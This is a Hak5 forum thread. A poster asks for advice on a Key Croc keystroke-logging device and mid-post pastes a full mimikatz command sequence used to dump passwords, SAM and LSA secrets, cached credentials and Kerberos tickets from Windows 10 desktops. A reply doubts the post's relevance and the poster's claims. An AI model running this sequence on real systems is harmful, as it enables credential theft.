Jump to content

About To Receive This Product - Any Advice or Tips?


Spraggins Designs
 Share

Recommended Posts

I already own the Bash Bunny Mark II, WiFi Pineapple Mark VII, and Ruber Ducky Deluxe.
I already am OSCP certified and run a clean Kali Linux 2021.3 right now.
I have enjoyed helping contribute to some of the code over at Bash Bunny Mark II GitHub Repository

I also work in IT and Web Design/Marketing at my college, and with my OSCP, they allow me to pentest their networks and devices.
Just today, I was able to use mimikatz on three different desktops running Windows 10 and Sophos.
I managed to dump three logs, with: This was quite amazing. I had to change a few things around. Still, ultimately I only needed the BB to carry the executable as a USB Drive, haha.
Anyway, any suggestions or advice for the Key Croc? I got it because I do not see anything else worth getting at the moment, and it also is in stock.

privilege::debug
log filename.log
token::elevate
sekurlsa::logonpasswords
sekurlsa::tickets /export
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

This was quite amazing. I had to change a few things around. Still, ultimately I only needed the BB to carry the executable as a USB Drive, haha.
Anyway, any suggestions or advice for the Key Croc? I got it because I do not see anything else worth getting at the moment, and it also is in stock. 
I also dumped 43 .kirbi files as well.
JSWBgyN.png

Link to comment
Share on other sites

Not sure I follow the post fully. What does the Mimicatz thing (and other inserted info) have to do with your question about what to do with the soon to be delivered Key Croc?

Generally it's rather difficult to give meaning to others decision to buy products if they don't see any use cases for it themselves. Start by reading the docs about the Croc and look at the Hak5 GitHub to get some inspiration on how it can be used and in what scenarios. There are some videos available as well. Get the free Key Croc e-book in the Hak5 shop and read it. In any way, the GitHub repos will keep you busy for quite a while.

It also seems like you have a colleague using the (almost) same nick on this forum since you seem to work in the same place with the same things and have the same background. Since both of you seem to be allowed to pentest your college equipment, perhaps you both should talk to the college about pentest scenarios where the Croc could be used. Being an OSCP, you most certainly have a lot of knowledge about what scenarios that could be considered useful for the Croc.

Just curious, what code have you contributed when it comes to the Bash Bunny?

  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...